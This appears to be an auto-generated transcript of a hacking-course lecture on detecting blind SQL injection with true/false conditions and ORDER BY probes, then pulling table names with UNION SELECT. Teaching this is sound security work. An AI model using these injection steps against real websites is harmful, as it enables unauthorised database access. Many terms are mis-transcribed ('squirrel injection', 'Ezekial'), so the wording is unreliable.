Lecture Transcript - Discovering & Exploiting Blind SQL Injections

And this lecture, I would like to show you an example of how to discover and exploit and a blind school

injection, now a blind squirrel injection is one that doesn't display any errors to you.

So we see in our previous examples, let me just go to a scale injection.

And if I just put a single quote here.

You'll see that it actually displays an error for me, which tells me that this page is vulnerable and

I can exploit this page with an Ezekial injection and applying the skill injection.

However, it will not show any errors for us.

So right here in the blind, this girl, if I put a quote and execute it, you see that it's not going

to show me any errors at all.

This doesn't mean that the Web page isn't vulnerable.

It just means that the website might not be displaying errors and this page might have a blind ESKILD

injection in real life scenarios.

I always approach the pages and try to discover exploit them as blind as skill injection.

So I never actually look for errors and I never depend on just input in a single quote.

The way I test for the existence of Bascule injections is that I try to inject a true and a false statement

and then see if if the page behaves according to the statements that I'm given.

So if I give it a true statement, it should give me a valid page.

If I give a false statement, it'll give me an invalid page.

What I mean by an invalid page is a page that doesn't look like what I expect, so it doesn't have to

show on error.

This will come murkier now in the example, I'm just going to put one out to see a valid page.

So literally I'm just putting a normal user ID and we can see that it's given us a valid page.

So it's given us the first name and the surname.

And this is what the default what a valid page look like in this Web application.

So the first thing I'm going to try to do is I'm going to try to give it a true statement, a statement

that returns a true and this is going to be and.

One is equal to one, so this is obviously true, and when I inject this, if the page is vulnerable,

it should still show me the Violet page.

So I'm going to inject it here, and one is equal to one.

I forgot to put my comment here, I'm just going to put the comment.

Percentage 23.

And now, as you can see, the page is showing me a valid page, again, showing the first name and

the surname, so it's executing well, I'm telling it, I thought that one is equal to one.

One is equal to one is a true statement.

It's not going to affect the execution of the page.

Now, what I'm going to do is I'm going to try to inject a false statement.

So I'm going to try to break the page, even though I'm given one, which is a valid idea.

So my first statement is going to be and one is equal to zero.

So that's going to be false.

And I'm going to go in and inject it now.

And as you can see, the page doesn't show the default valid page, even though I'm given no one.

So you don't see any errors like we've seen with the normal ESKIL injections, but you can see that

the page is invalid.

It's not displaying what it should display, even though we're given the ID equals one.

So when we give a true statement, it's it's given a valid page.

When we give a false statement, it's given an invalid page.

We can also verify this using the order vibe.

So I'm going to put one and then I'm going to ask it to order by one.

So order by only one column, which basically is a true statement.

It's always true.

So.

This is going to be my true statement and I'm going to execute it here.

And as you can see now, it's displaying the valid page that we've seen with the and one zero to one,

so we can also change this to a false statement to give us an invalid page and we're going to ask it

to order by a very large number.

So I'm just going to put one zero zero zero zero.

So this is going to be my full statement, and if the pages injectable, then it should show me an invalid

page or a page that I don't really expect.

And again, we see a page that we don't expect, which means that this website is vulnerable, even

though it doesn't actually show us any error pages about the actual.

Now that we are sure that this page is vulnerable, we can actually exploit this vulnerability exactly

the same way that we exploit normal scale injections.

So I can just do union select one to.

And as you can see, I can display stuff in one and two and I'm going to select table name.

From.

Formations, Kemar, the tables.

And I've actually misspelled schema here.

So the exploitation part is exactly the same, whether it's a blind or a normal scale injection.

The only difference is the way you discover it.

And I recommend that you always approach your websites and try to discover blindness, Ezekial injections.

So I never rely on only using a quote, always try to use the and one is equal to one, one is equal

to zero and also use the other thereby to try and discover this type of vulnerabilities.

Because if you rely on the quotes, you'll be missing a lot of blind ESKIL injections that are just

as useful as normal ESKIL injections.